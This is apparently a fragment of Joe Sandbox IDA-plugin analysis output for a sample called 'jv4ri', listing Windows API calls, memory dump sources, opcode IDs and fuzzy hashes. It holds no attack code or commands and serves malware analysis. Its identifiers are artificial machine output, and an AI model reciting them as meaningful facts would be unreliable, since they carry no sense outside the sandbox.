                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C903DB
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C903E6
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C903F1
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C903F9
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C90401
                      • Part of subcall function 00C86259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00C862B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C7FB2D
                    • OleInitialize.OLE32(00000000), ref: 00C7FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00CB49F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                    • String ID:
                    • API String ID: 3094916012-0
                    APIs
                    • _memset.LIBCMT ref: 00C74401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C744A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C744C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9A3AB: __NMSG_WRITE.LIBCMT ref: 00C9A3D2
                      • Part of subcall function 00C9A3AB: __NMSG_WRITE.LIBCMT ref: 00C9A3DC
                    • __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9A408: GetModuleFileNameW.KERNEL32(00000000,00D343BA,00000104,00000000,00000001,00000000), ref: 00C9A49A
                      • Part of subcall function 00C9A408: ___crtMessageBoxW.LIBCMT ref: 00C9A548
                      • Part of subcall function 00C932DF: ___crtCorExitProcess.LIBCMT ref: 00C932E5
                      • Part of subcall function 00C932DF: ExitProcess.KERNEL32 ref: 00C932EE
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CD97D2,?,?,?,?,?,00000004), ref: 00CD9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CD97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CD9B5B
                    • CloseHandle.KERNEL32(00000000,?,00CD97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CD9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    APIs
                    • _free.LIBCMT ref: 00CD8FA5
                      • Part of subcall function 00C92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C99C64), ref: 00C92FA9
                      • Part of subcall function 00C92F95: GetLastError.KERNEL32(00000000,?,00C99C64), ref: 00C92FBB
                    • _free.LIBCMT ref: 00CD8FB6
                    • _free.LIBCMT ref: 00CD8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    APIs
                    • 745AC8D0.UXTHEME ref: 00C74992
                      • Part of subcall function 00C935AC: __lock.LIBCMT ref: 00C935B2
                      • Part of subcall function 00C935AC: RtlDecodePointer.NTDLL(00000001), ref: 00C935BE
                      • Part of subcall function 00C935AC: RtlEncodePointer.NTDLL(?), ref: 00C935C9
                      • Part of subcall function 00C74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C74A73
                      • Part of subcall function 00C74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C74A88
                      • Part of subcall function 00C73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C73B7A
                      • Part of subcall function 00C73B4C: IsDebuggerPresent.KERNEL32 ref: 00C73B8C
                      • Part of subcall function 00C73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D362F8,00D362E0,?,?), ref: 00C73BFD
                      • Part of subcall function 00C73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C73C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C749D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                    • String ID:
                    • API String ID: 2688871447-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: fea6d6316eba606a8774257ecadfca4d8084690f09df907e1e368bb3c131b207
                    • Instruction ID: 3f2ba0767ef7701e1b74c6df45cdef79dbe106c70bf747220a64dd0c801c3ad1
                    • Opcode Fuzzy Hash: fea6d6316eba606a8774257ecadfca4d8084690f09df907e1e368bb3c131b207
                    • Instruction Fuzzy Hash: 48018F71C40A09EFCF23AF699C0E99E7B61AF81760F148215F8245B1E1DB318B21EB95
                    APIs
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • __lock_file.LIBCMT ref: 00C9561B
                      • Part of subcall function 00C96E4E: __lock.LIBCMT ref: 00C96E71
                    • __fclose_nolock.LIBCMT ref: 00C95626
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: cbc28f8bb51b44ab537194e9bd109af76e6cb096074ce21651909ced86b09b5b
                    • Instruction ID: 47ec93926602d4564a00946c81f0675823940d54d0fe47ddc4b9f85989bbad2c
                    • Opcode Fuzzy Hash: cbc28f8bb51b44ab537194e9bd109af76e6cb096074ce21651909ced86b09b5b
                    • Instruction Fuzzy Hash: ECF0B471901A05DBDF22BF769C0E76E7BA16F41334F558209F424AB2C1CF7C8A05AB55
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20c71d825b5bf49f35fe926f10c0fb44b18647379e05c4d5bbfcc58dd2a9fe03
                    • Instruction ID: 3a2ff8d9868a8868e786c427359c2a082aa06b21229fd56e62a21433c1c004bc
                    • Opcode Fuzzy Hash: 20c71d825b5bf49f35fe926f10c0fb44b18647379e05c4d5bbfcc58dd2a9fe03
                    • Instruction Fuzzy Hash: 47618A7060420A9FDB24DF64C981ABAB7F5EF44300F14C47DE91A9B242EB71EE52DB51
                    APIs
                      • Part of subcall function 031408E0: GetFileAttributesW.KERNELBASE(?), ref: 031408EB
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0314119F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesCreateDirectoryFile
                    • String ID:
                    • API String ID: 3401506121-0
                    • Opcode ID: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                    • Instruction ID: bdac22c5ef1bd912c6350f878348d901d5c37f77020bac865f3719b88108bdfd
                    • Opcode Fuzzy Hash: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                    • Instruction Fuzzy Hash: 52518631A1020997DF14EFB0C954BEF7379EF5C700F0045A9A609E7180EB799B45CBA5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a3f3cd95af7fcff83c4258088012220ad73dce10f1ad6c8dc94a73e8a5e4ff5f
                    • Instruction ID: 73a6849603174924aa957ae2c814ce1e203399fcd14fdc49bd4f61d0e689395f
                    • Opcode Fuzzy Hash: a3f3cd95af7fcff83c4258088012220ad73dce10f1ad6c8dc94a73e8a5e4ff5f
                    • Instruction Fuzzy Hash: 8F411874508341CFDB24DF14C484B1ABBE0BF85318F19899CE99A4B362D332EC85CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 7281a4f777936e06ac205cd9b53cfe6b8452754bec8093e56af4b3a50fb619b5
                    • Instruction ID: 38b671bae27c204335e7bae8cf948ded69e9ec2f691a7164a3528be420f03992
                    • Opcode Fuzzy Hash: 7281a4f777936e06ac205cd9b53cfe6b8452754bec8093e56af4b3a50fb619b5
                    • Instruction Fuzzy Hash: 40214F3160460AEBDF208F65EC827397BB8FF24350F21C16EE48AC6191EB3091E29324
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: f28a7cf14a6d638c3f82821e16e842b9fa6e9f4b4c7eb3b1a046eb5b5f588ead
                    • Instruction ID: 5c0172ca7d64ae130974d02253c63763ff06b4b1c1ea01c59ca1812cde62e610
                    • Opcode Fuzzy Hash: f28a7cf14a6d638c3f82821e16e842b9fa6e9f4b4c7eb3b1a046eb5b5f588ead
                    • Instruction Fuzzy Hash: D811A572900519DBCB14EBA9DCC19EEF778EF54360F50812AE829A7190EB309E05EB90
                    APIs
                      • Part of subcall function 00C74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C74D4D
                      • Part of subcall function 00C9548B: __wfsopen.LIBCMT ref: 00C95496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74F6F
                      • Part of subcall function 00C74CC8: FreeLibrary.KERNEL32(00000000), ref: 00C74D02
                      • Part of subcall function 00C74DD0: _memmove.LIBCMT ref: 00C74E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 8b9de183d514ccf7d4edc911e1ebe16020acc423bc178f761d074289ca8fa04e
                    • Instruction ID: df6c5cb0ffdc4b59176669e8fb314133a81861a35f76654b1d63b9665ead153a
                    • Opcode Fuzzy Hash: 8b9de183d514ccf7d4edc911e1ebe16020acc423bc178f761d074289ca8fa04e
                    • Instruction Fuzzy Hash: 3811E731700209ABCB19EF74CC06B6E77A49F41700F10C42DF546A61C1DB719A05ABA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 5729521f6dbb17dbf27a72a91318b123e22bac4c190bf7146fee4e0eb00cbfbf
                    • Instruction ID: 45ad2e0f1b7fed665b2a3791c95cfc605c706dcd2dd4dd07da5114808af3b6f0
                    • Opcode Fuzzy Hash: 5729521f6dbb17dbf27a72a91318b123e22bac4c190bf7146fee4e0eb00cbfbf
                    • Instruction Fuzzy Hash: F4210FB4508341DFCB24DF24C485B2ABBE0BF88304F08896CE9AA47761D732E859DB53
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: 3186f652c77cbac9044771bb4c19ac5eb40132ca579ea4fe75253f1ff4d1d35f
                    • Instruction ID: b9e3a8b28e1c68e9c83c4c79b19fc47dd92e7178c9cb765812b824692fae8afd
                    • Opcode Fuzzy Hash: 3186f652c77cbac9044771bb4c19ac5eb40132ca579ea4fe75253f1ff4d1d35f
                    • Instruction Fuzzy Hash: E601F171D042469FDB154F688880AEAFFB4EF46310F0580AAD828EB261E7308D41CB80
                    APIs
                    • __lock_file.LIBCMT ref: 00C94AD6
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: aa77eaafa5b0efc0f4a27c3feec0c98faff16dba30bfb8b309104a1d7f774123
                    • Instruction ID: ddcbf024a1493e20f0b8f35e3d4c3cab0e535a92480477b664c9e722a469e4b6
                    • Opcode Fuzzy Hash: aa77eaafa5b0efc0f4a27c3feec0c98faff16dba30bfb8b309104a1d7f774123
                    • Instruction Fuzzy Hash: C7F0AF31940209ABDF65AF748C0EBAE36A1AF01726F088514F424AB1D1CF788A56FF55
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: a70f239e06bc19b9e7e119dd66c30604394d2b12b9f19c89747243a6424ac5d4
                    • Instruction ID: a8c551c8490846bd27b832e4c39fae8ac3738a147620cd21746d30dc7f6dbe77
                    • Opcode Fuzzy Hash: a70f239e06bc19b9e7e119dd66c30604394d2b12b9f19c89747243a6424ac5d4
                    • Instruction Fuzzy Hash: ABF03971105712CFCB389FA5E494926BBE1BF04329321CA3EE1EA82610C731A940DF40
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C909F4
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: fd1eb961d9a58ab1471540b9d3e2ce0278b871940b8c7d887c51b436ac50d2e0
                    • Instruction ID: 55e4ca92c6acaa6cb78bdbe06a2c8f3662f7acfbea1d98e29631e66ac91f6d21
                    • Opcode Fuzzy Hash: fd1eb961d9a58ab1471540b9d3e2ce0278b871940b8c7d887c51b436ac50d2e0
                    • Instruction Fuzzy Hash: F1E0CD7690422C57C720D69C9C05FFA77EDDF89790F0441B5FC0CD7204D9609C818691
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: fb9cd4e377558c58338361df3b366096ba59dbd1126b3b9f7d8a5e141b17003c
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: B1E09AB0204B009FDB398A24D814BE373E0EB06319F00081DF2AA83382EB62B8418B59
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 031408EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction ID: df444eace0e66d774c796f1c818d4989bdb1ad741b63c1c86f210ae06627ebca
                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction Fuzzy Hash: 30E086B191520CDBD714CBB9C9046A9B3A8D74C310F004654E619C3180D634C9409654
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 031408BB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction ID: 0a2fcf64b85fa52e25655135bbef49f6159d1da686162f5bbf4f18c2e9f29813
                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
